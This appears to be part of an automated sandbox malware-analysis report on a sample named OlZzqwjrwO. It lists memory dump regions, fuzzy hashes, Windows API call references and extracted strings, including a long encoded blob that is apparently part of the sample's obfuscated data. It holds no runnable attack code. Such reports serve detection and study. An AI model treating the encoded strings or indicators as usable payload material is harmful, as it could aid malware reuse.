                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                              • Instruction ID: 0a1bca97f873a7a6d6a3aaff04d58e0ae48002bfba7cab88bc6042a4b6745ab0
                                                              • Opcode Fuzzy Hash: 14f6e479ba9ecabd101c7c373dc08ee6d0ff72b1ef0e7f0e2d8669747df763cc
                                                              • Instruction Fuzzy Hash: F841F2726013149FD320DF15DC80B26B7E4FF84718F16452AED4587725E778F850CA99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: affec256aca3101603e5e9c8b6c14aac85f880b69ce3fa9b32540f72830965cb
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 62113BF7A0104243D7058A2DF9B47B7D395EFCE320F2C626BD0514B758D12AE9459608
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                              • Instruction ID: c3a51ff81cd43cadc2f91b9d343c289a0ae24623370d929bafb0354b6f338a0e
                                                              • Opcode Fuzzy Hash: 61e10354841268cd05691efce0a8c9eb762bb4252619a69a0da3101ddd28b7c0
                                                              • Instruction Fuzzy Hash: F61194B66002147FE3006F69DC85E27BADCEB44354F45817AFD089B212D639ED14C6A5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                              • Instruction ID: 775a38982ecc14386774c10a2ff7988f4febef0241ab9f2fac4c7ed0a075f983
                                                              • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                              • Instruction Fuzzy Hash: 5F21AF71A002268FCB24CF58C890B6BB7B1FF86708F69865DC8066B342D775EC42CB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Offset: 00979000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_979000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 68901295b6a57772498564e95abf2ae43c8f4baf849f06757c8a7b0dd304864e
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: 64113C73340100AFDB54DE55EC91FA673EAEB89360B298165E908CB356D679EC41C7A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                              • Instruction ID: 5cf5f964e5d4fdf4ab25e9de6bfd162346dccf7c83c49c61d1a40ba7c9897cbe
                                                              • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                              • Instruction Fuzzy Hash: 36118A77A1827107D711CE759CE021AF7629BC622270F4376D981AB352C170EC5892D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                              • Instruction ID: 5e6f75d6069618f27f4e8ece13d34dcb27fa1cb4973037488a19f9399b438bca
                                                              • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                              • Instruction Fuzzy Hash: 04E01A75A116849FD7018F25E994B007BA1E704B10F458066F800D7A79F3B86C80CF8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                              • Instruction ID: ab48da6bb73ea6f11754c2489eadc58114c305f60cbedb05e3b309eec18089fa
                                                              • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                              • Instruction Fuzzy Hash: B9E01A35A006849ED7028F25DC94B007BA1F715B10F448065E401D7E79F3B46C80CF4B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                              • Instruction ID: 2572daf3ac28ea9ece149f63ca22f641f49709f61c5ee85f622209572a58cfb2
                                                              • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                              • Instruction Fuzzy Hash: 33D08C31365650AFCB41DB48DD42F00B3E0EB48B32F258282B830AB2F2C724FE41CA05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                              • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                              • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                              • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 00459ABE
                                                              • CatchIt.LIBVCRUNTIME ref: 00459C1D
                                                              • _UnwindNestedFrames.LIBCMT ref: 00459D1E
                                                              • CallUnexpected.LIBVCRUNTIME ref: 00459D39
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm$x@F
                                                              • API String ID: 2332921423-3829711656
                                                              • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                              • Instruction ID: 2a8b5e3cbe88d0ad45d83a49b6c8541956edddbcc5d33c7cd0fd48112d7d16c1
                                                              • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                              • Instruction Fuzzy Hash: F9B16771800249EBCF19DFA5C8819AEB7B5FF04316F18415AEC116B213D338EE59CBA9
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045C0FF), ref: 0045C7AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                              • Instruction ID: 82d02ba150d8eb4d5d6beeccfbe315dd90ac4e528bf330bfbd80dbdd17a07d9b
                                                              • Opcode Fuzzy Hash: 5e24f046aca33eb0cff77f92b4cd243a788ff9568f881d4540edd6063b6ff4d5
                                                              • Instruction Fuzzy Hash: 585170B0900B0ADFCF149F69D8C81AEBBB0FB45316F14414BD881A6256DB788959CF5E
                                                              APIs
                                                                • Part of subcall function 00454B19: CreateFileW.KERNEL32(00000000,00000000,?,00454716,?,?,00000000,?,00454716,00000000,0000000C), ref: 00454B36
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76FCF770), ref: 00454781
                                                              • __dosmaperr.LIBCMT ref: 00454788
                                                              • GetFileType.KERNEL32(00000000), ref: 00454794
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76FCF770), ref: 0045479E
                                                              • __dosmaperr.LIBCMT ref: 004547A7
                                                              • CloseHandle.KERNEL32(00000000), ref: 004547C7
                                                              • CloseHandle.KERNEL32(00455523), ref: 00454914
                                                              • GetLastError.KERNEL32 ref: 00454946
                                                              • __dosmaperr.LIBCMT ref: 0045494D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID:
                                                              • API String ID: 4237864984-0
                                                              • Opcode ID: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                              • Instruction ID: 038922a14cfed84d654bc7e4756cd55dec8d6f56b9250bad4a8b086e30f44e5e
                                                              • Opcode Fuzzy Hash: 997a49fbc66ddc57f6d03171bfc3be2bb67f50b3a1fb2b3f505c03722e716457
                                                              • Instruction Fuzzy Hash: C4A13731A041449FCF189F68DC91BAE3BA0EB87329F14015EFC019F392DB78885AC75A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %1.17g$[,]{: }$false$null$true
                                                              • API String ID: 4218353326-762322047
                                                              • Opcode ID: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                              • Instruction ID: 8a31c525fd10ccff58647d80abb421e7a2f49e00f52c285c36168c55111fec75
                                                              • Opcode Fuzzy Hash: 2324184d7edb75108883178119c67932e8752769ab166018bc3f016b95bef789
                                                              • Instruction Fuzzy Hash: E8B1E4F27043015BC701A9298C5062BA6DA9FD1318F19493FEF59E33C2FA7EDD16425A
                                                              APIs
                                                              • CreateCompatibleDC.GDI32(00000D62), ref: 008B2AFB
                                                              • DeleteDC.GDI32(00000002), ref: 008B2D68
                                                              • DeleteObject.GDI32(?), ref: 008B2D71
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Delete$CompatibleCreateObject
                                                              • String ID:
                                                              • API String ID: 1022343127-0
                                                              • Opcode ID: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
                                                              • Instruction ID: 16104b6d5fed36e67c9919151c1c577002746cf357e3a7f13d25caacca3eed9f
                                                              • Opcode Fuzzy Hash: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
                                                              • Instruction Fuzzy Hash: 3881E7B190021E9FDF208F988CC99FE7F74FB19324F281516E518EA3A0D3758A419767
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 0043D7A7
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0043D7AF
                                                              • _ValidateLocalCookies.LIBCMT ref: 0043D838
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0043D863
                                                              • _ValidateLocalCookies.LIBCMT ref: 0043D8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                              • Instruction ID: f027fe2574540ca3b1f88e77f7abec4aa80c90a537e94c27518ff210aad43bfc
                                                              • Opcode Fuzzy Hash: 58ff33bdf8008059ad35d38e020e237fee552c53fd08c9077c5a83c4f96b7bce
                                                              • Instruction Fuzzy Hash: 0041EA34D012089BCF14EF69D881A9F7BB5FF48318F14816BE8249B352D739EA15CB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                              • Instruction ID: 20f6fc253ed9e18728f1e3e0f73237be974277a9ced04a575444c598e2f27323
                                                              • Opcode Fuzzy Hash: 3a5e2e9da0023be33419689324beaf6a0f6f9f49e5a11a4ea9d7c3ac7b732d46
                                                              • Instruction Fuzzy Hash: 05B1F574A04285AFDB15CF99C980BBE7BB1BF86305F14415BE80067393C7B89D4ACB69
                                                              APIs
                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 0044C6B4
                                                              • __FindPESection.LIBCMT ref: 0044C6D1
                                                              • VirtualQuery.KERNEL32(83000000,2263B8EC,0000001C,2263B8EC,?,?,?), ref: 0044C7B6
                                                              • __FindPESection.LIBCMT ref: 0044C7F3
                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                              • __FindPESection.LIBCMT ref: 0044C82D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                                              • String ID:
                                                              • API String ID: 2529200597-0
                                                              • Opcode ID: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                              • Instruction ID: e40285013e32dfb27aa5986082f3d9acaacd06ee7156ac865e10eba53592a1aa
                                                              • Opcode Fuzzy Hash: d01001b2250a4bc4d006de8e8775feca4cce7e2fc65dbb3aa6a0fb1d6a9ecab3
                                                              • Instruction Fuzzy Hash: 71A1F375E022159BEB50CFA9D9C07BEB3A4EB49314F19412AD855E3361E739DC028FA8
                                                              APIs
                                                              • __allrem.LIBCMT ref: 008C5B59
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C5B75
                                                              • __allrem.LIBCMT ref: 008C5B8C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C5BAA
                                                              • __allrem.LIBCMT ref: 008C5BC1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C5BDF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
                                                              • Instruction ID: 0da8f536360b0fb26740d06565fda84bcb44ac6cc97d4910cd2df6c42613e781
                                                              • Opcode Fuzzy Hash: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
                                                              • Instruction Fuzzy Hash: 6D81C471600B169BEB249F6DCC81F6AB7B9FF54324F24862EF411D6781E770E9808752
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00432EBD
                                                                • Part of subcall function 00430E6C: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                                • Part of subcall function 00432718: CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                              • String ID: Ku^%$Ku^%
                                                              • API String ID: 392924372-1067927601
                                                              • Opcode ID: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                              • Instruction ID: 62ef33d165420df4abe6194fc317c011647a9d43179361cb113ffb45af4e0bee
                                                              • Opcode Fuzzy Hash: ffdc60f1e004c543c03ed2e42b24d9c624f6bc23b499833a74f790060f19a536
                                                              • Instruction Fuzzy Hash: 4AE12B71E006158BDF289E598D8657FB7B0AB0C314F24292BE511FA390D7BC9A418B8B
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0044C1F9,0043D4A6,0043CFF7), ref: 0044C210
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0044C21E
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044C237
                                                              • SetLastError.KERNEL32(00000000,0044C1F9,0043D4A6,0043CFF7), ref: 0044C289
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                              • Instruction ID: c0e2f545b2bb83990020f58b3cafac4cb819fbf5ee5e5dfe57bf4abdb9a8f05a
                                                              • Opcode Fuzzy Hash: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                              • Instruction Fuzzy Hash: 5601F53260B6116EB69117B66CC656B2A88EF1137A328033FF920851F2FFD94C41919D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcsrchr
                                                              • String ID: .bat$.cmd$.com$.exe
                                                              • API String ID: 1752292252-4019086052
                                                              • Opcode ID: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                              • Instruction ID: b55bede8d45b761b400ac8ce0250aded4c8690036b953bdef2cda7eece1c3866
                                                              • Opcode Fuzzy Hash: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                              • Instruction Fuzzy Hash: A8010477A24A56213614156D9C0267797988B93BB6727402FFC44EB2C2EEECED02019E
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2263B8EC,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044394B
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044395D
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044397F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                              • Instruction ID: 98d842734981b974643d07bc2e17aaafc6a7a08e37008b1518908caaa5ffc225
                                                              • Opcode Fuzzy Hash: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                              • Instruction Fuzzy Hash: DC01A771904655EBDB118F50CC05BAEB7B8FB44B51F000626E811A22D0EBF89A04CA99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                              • Instruction ID: 8aab27407c0a82a01c0ac988981d35579ce087bbb9e55deaa5eb6bc71ee87661
                                                              • Opcode Fuzzy Hash: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                              • Instruction Fuzzy Hash: 6C51707990024DAAEF00EFE4D844AEEB7B8FF09710F11405BE815E7250EB74DA45CB6A
                                                              APIs
                                                              • GetFileType.KERNEL32(00446BF7,?,00000000,?), ref: 00446CF4
                                                              • GetFileInformationByHandle.KERNEL32(00446BF7,?), ref: 00446D4E
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00446BF7,?,000000FF,00000000), ref: 00446DDC
                                                              • __dosmaperr.LIBCMT ref: 00446DE3
                                                              • PeekNamedPipe.KERNEL32(00446BF7,00000000,00000000,00000000,?,00000000), ref: 00446E20
                                                                • Part of subcall function 00446999: __dosmaperr.LIBCMT ref: 004469CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 1206951868-0
                                                              • Opcode ID: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                              • Instruction ID: 7fef5dbdd5f1ebb30aa965719069ce331059867e0b66cf3bcb9aaaf835df89e4
                                                              • Opcode Fuzzy Hash: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                              • Instruction Fuzzy Hash: 584160B5A00704AFEB24DFA5DC459ABBBF9FF89304B11452EF846D3610E734A845CB16
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00419705
                                                              • _wctomb_s.LIBCMT ref: 00419800
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 0041986B
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004198F9, 00419958, 0041998F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$_wctomb_s
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK
                                                              • API String ID: 2587698369-3172509236
                                                              • Opcode ID: e38c58a5a5958fed477ecaf3075b22f118631efb8f19824a914c76d591f83435
                                                              • Instruction ID: b61214d9bb6ea9f5f500f4b7bc4d1bc7ad059250a5a7ab9ce73f7134a944e9a2
                                                              • Opcode Fuzzy Hash: e38c58a5a5958fed477ecaf3075b22f118631efb8f19824a914c76d591f83435
                                                              • Instruction Fuzzy Hash: 14E1B6B1E042099BDF249A989CA65FE7674BB44310F24052BE555EA3D0D37C8EC18B9F
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %1.17g$,]{: }$null
